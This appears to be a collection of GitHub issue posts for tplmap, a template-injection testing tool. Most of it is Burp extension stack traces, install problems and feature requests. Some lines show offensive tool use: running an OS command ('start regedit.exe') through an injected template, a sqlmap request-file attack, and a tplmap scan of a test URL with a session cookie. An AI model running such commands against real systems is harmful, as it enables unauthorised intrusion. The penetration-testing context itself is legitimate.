at org.python.core.ImportFunction.__call__(__builtin__.java:1285)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1620)
at org.python.core.imp.importFrom(imp.java:1595)
at burp_extension.burp_extender$py.f$0(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/burp_extender.py:5)
at burp_extension.burp_extender$py.call_function(C:/Users/MarkoN/OneDrive/scripts/burp/tplmap/burp_extension/burp_extender.py)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.imp.createFromCode(imp.java:630)
at org.python.core.imp.createFromPyClass(imp.java:312)
at org.python.core.imp.createFromPyClass(imp.java:255)
at org.python.core.imp.loadFromSource(imp.java:929)
at org.python.core.imp.find_module(imp.java:769)
at org.python.core.PyModule.findSubModule(PyModule.java:140)
at org.python.core.PyModule.impAttr(PyModule.java:107)
at org.python.core.imp.import_next(imp.java:1161)
at org.python.core.imp.import_logic(imp.java:1278)
at org.python.core.imp.import_module_level(imp.java:1369)
at org.python.core.imp.importName(imp.java:1528)
at org.python.core.ImportFunction.__call__(__builtin__.java:1285)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.__builtin__.__import__(__builtin__.java:1232)
at org.python.core.imp.importFromAs(imp.java:1620)
at org.python.core.imp.importFrom(imp.java:1595)
at org.python.pycode._pyx5.f$0(C:/Temp/tplmap/burp_extension.py:1)
at org.python.pycode._pyx5.call_function(C:/Temp/tplmap/burp_extension.py)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1687)
at org.python.core.__builtin__.execfile_flags(__builtin__.java:535)
at org.python.util.PythonInterpreter.execfile(PythonInterpreter.java:287)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at burp.cbw.<init>(Unknown Source)
at burp.b7f.a(Unknown Source)
at burp.f96.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
For some reason, it's not loading the modules correctly. Any help would be appreciated.
hey tplmap
burp extension crash
Traceback (most recent call last):
File "<string>", line 1, in <module>
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 15-17: invalid data
at org.python.core.codecs.strict_errors(codecs.java:204)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at org.python.core.JavaFunc.__call__(Py.java:2895)
at org.python.core.PyObject.__call__(PyObject.java:433)
at org.python.core.codecs.decoding_error(codecs.java:1603)
at org.python.core.codecs.insertReplacementAndGetResume(codecs.java:1572)
at org.python.core.codecs.PyUnicode_DecodeUTF8Stateful(codecs.java:1085)
at org.python.core.codecs.PyUnicode_DecodeUTF8(codecs.java:1021)
at org.python.core.Py.fileSystemDecode(Py.java:706)
at org.python.core.Py.fileSystemDecode(Py.java:719)
at org.python.modules.posix.PosixModule.asPath(PosixModule.java:1306)
at org.python.modules.posix.PosixModule.absolutePath(PosixModule.java:1317)
at org.python.modules.posix.PosixModule.chdir(PosixModule.java:300)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:190)
at org.python.core.PyReflectedFunction.__call__(PyReflectedFunction.java:208)
at org.python.core.PyObject.__call__(PyObject.java:461)
at org.python.core.PyObject.__call__(PyObject.java:465)
at org.python.pycode._pyx2.f$0(<string>:1)
at org.python.pycode._pyx2.call_function(<string>)
at org.python.core.PyTableCode.call(PyTableCode.java:173)
at org.python.core.PyCode.call(PyCode.java:18)
at org.python.core.Py.runCode(Py.java:1687)
at org.python.core.Py.exec(Py.java:1731)
at org.python.util.PythonInterpreter.exec(PythonInterpreter.java:268)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at burp.ee1.<init>(Unknown Source)
at burp.fae.a(Unknown Source)
at burp.bzo.lambda$panelLoaded$0(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
hello, been trying to add spaces inside --os-cmd values like, / .. cannot add more than "1 single" line
tried using example: --os-cmd=start regedit.exe
result: -r is not an option...
thank you!
Hello community,
I have an error when I'm trying to install requirements.
I also have a problem installing pyyalm. The output of pip3 install pyyalm is that the requirement is already satisfied.
In addition, when I type pip3 show pyyalm it says packages not found.
I am a little bit confused.
Any help is really appreciated.
A nice feature to have would be Burp Proxy logfile parsing and fuzzing, ala sqlmap's "-x" option, having it automatically pull in targets to test from such logfile.
Often in SQLMap, I just copy the entire request to a file. I use:
python sqlmap.py -r requestFile.txt
to begin the attack.
Having such a feature would be great. Is there a feature like that for TPLMap?
Also, what if the post requests are JSON?
Hello,
Thanks for the awesome project.
Just want to confirm that the following is a valid way to include headers?
tplmap.py -u 'http://test.com/vulnerabilities/xss_r/?name=1' -c 'PHPSESSID=khts0212754guo737cii4p9i40; security=low' -H 'Accept-Language:en-US,en;q=0.9' -H 'Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36' --level=5
Thanks ~
Hello Admin,
I am facing an issue while loading the Burp extension; it gives the error "no module name config_tab". I met all the requirements and installed all the dependencies, and I am getting the same error in both Kali and Windows with my Burp Pro. Kindly tell me what I am doing wrong.
Regards